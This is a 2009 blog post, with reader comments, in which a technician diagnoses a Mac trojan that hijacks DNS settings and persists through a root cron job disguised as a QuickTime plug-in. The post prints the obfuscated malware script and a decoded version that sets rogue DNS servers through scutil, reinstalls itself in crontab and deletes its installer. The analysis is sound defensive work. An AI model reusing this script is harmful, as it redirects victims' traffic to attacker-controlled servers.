Thursday, 15 January 2009

Mac Malware / Trojan

Just today I was telling someone viruses (virii?) weren't an issue on the Mac. OSX is pretty secure I told him but you should have AV software to stop you passing on nasties to your windows friends and colleagues.

Eat my words I did. That afternoon a phone call from another client. He had a problem with no Internet access on his wireless network but others on the network were OK. First test try a site by IP. Fine, so it's a DNS issue..

Yes..but so much more. They had a pretty basic router so monitoring was not an option. OK talk him through opening the terminal and pinging some sites. Takes a while then fails to look it up. OK lets check /etc/resolv.conf...


Oh crap... two of these were not in the TCP settings. I'll let you work out which two...

Further checking...

nick@host ~ $ host
;; connection timed out; no servers could be reached
nick@host ~ $ host
Host not found: 2(SERVFAIL)
nick@host ~ $ whois
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
% Rights restricted by copyright.
% See

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to ' -'

inetnum: -
netname: UkrTeleGroup
descr: UkrTeleGroup Ltd.
admin-c: UA481-RIPE
tech-c: UA481-RIPE
country: UA
org: ORG-UL25-RIPE
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-routes: UKRTELE-MNT
mnt-domains: UKRTELE-MNT
source: RIPE # Filtered

Oh crap more... Checked the Startup Items and launchctl but everything looked normal. No processes stood out. How else could it launch? Ah...

Bad-Person-Computer:~ user$ sudo crontab -l
* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1

Smooth... and this file looks like...

more /Library/Internet\ Plug-Ins/QuickTime.xpt

x=`cat "$0" wc -lawk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aas.wq;s2=cx.zxx.aaz.axz;sh 1 `echo $s1tr qazwsxedcr 0123456789` `echo $s2 tr qazwsxedcr 0123456789`;exit;
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi tjkd PjphajcSkjsplk okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
/voj/obpf/olvxpi << EOF
q.aqq SkjskjAqqjkooko * $1 $2
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
kepox=`ljnfxab -itjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
ljnfxab ljnf.pfox
jh -jr ljnf.pfox
jh -jr "$0"

It even hides itself so you can't just grep the name server addresses. Roughly translated it gives...


path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil grep PrimaryService sed -e 's/.*PrimaryService : //')<< EOF
get State:/Network/Global/IPv4
)/usr/sbin/scutil << EOF
d.add ServerAddresses * $1 $2
set State:/Network/Service/$PSID/DNS
exist=`crontab -lgrep QuickTime.xpt`
if [ "$exist" == "" ]; then
echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
crontab cron.inst
rm -rf cron.inst
rm -rf "$0"

Simple but I guess there were nasties just waiting to be got from some websites this machine was redirected to. Very Mac specific so not a Linux trojan gone astray. I guess he fell for one of the download this codec type trojans and got this little parasite.

So although we don't have virii in the Mac world little wank stains are out there targeting the Mac using social engineering. I guess you could exploit one of the safari or firefox holes are even spoof someones bank given the recent certificate bypass expoloit..

So I guess the times of relying on security through obscurity are over. I'm not sure if this guy has a name but it made my day a lot more interesting!


John Muccigrosso said...

"Viri" if you must Latinize. (It means slime or poison.)

neural said...

i believe in this case, they would have seen these dns entries in their network preference pane, greyed out, under advanced/dns.

drbroom said...


Great post... just one note it's not "resolve.conf" it is "resolv.conf" and you should tell people that they can find the file in their "etc" directory.

I know that may be nit picking but I think since you gave all the cool info you did you should let people know where they can look to make sure they are not effected. (I really didn't mean to nitpick I think some may do what I did and just copy the file name to look up what was in it...)

Anyway, I do have one question... Did you figure out what your client downloaded (and installed)? Curious minds would like to know? :-)

thanks again for the great info.

Nick Brooker said...

drbroom: Thanks for the feedback. I was buzzing a bit when I wrote it missed the resolve typo.

The date modified on the file was March 2008 and he coudn't recall anything from that time but hopefully someone else can find the trojan and tie it to something.

Nick Brooker said...

Sorry just realised the first cut and paste had chopped some out. The script is correct now...

Andrew Main said...

"'Viri' if you must Latinize. (It means slime or poison.)"

Good try, but still incorrect: "viri" is the plural of "vir" (man). There is in fact no attested plural of "virus" (slime or poison) in surviving Latin texts, but the best guess of scholars is that if it had one (it very possibly did not) it would be "viruses", which happens also to be the plural if treated as an English word.


Blogger said...

BlueHost is ultimately one of the best web-hosting company for any hosting services you might need.

Postfix with ECDSA certificate not connecting

I was playing with this a while back and it didn't work and got forgotten about but this time I dug into it further. There are lots of...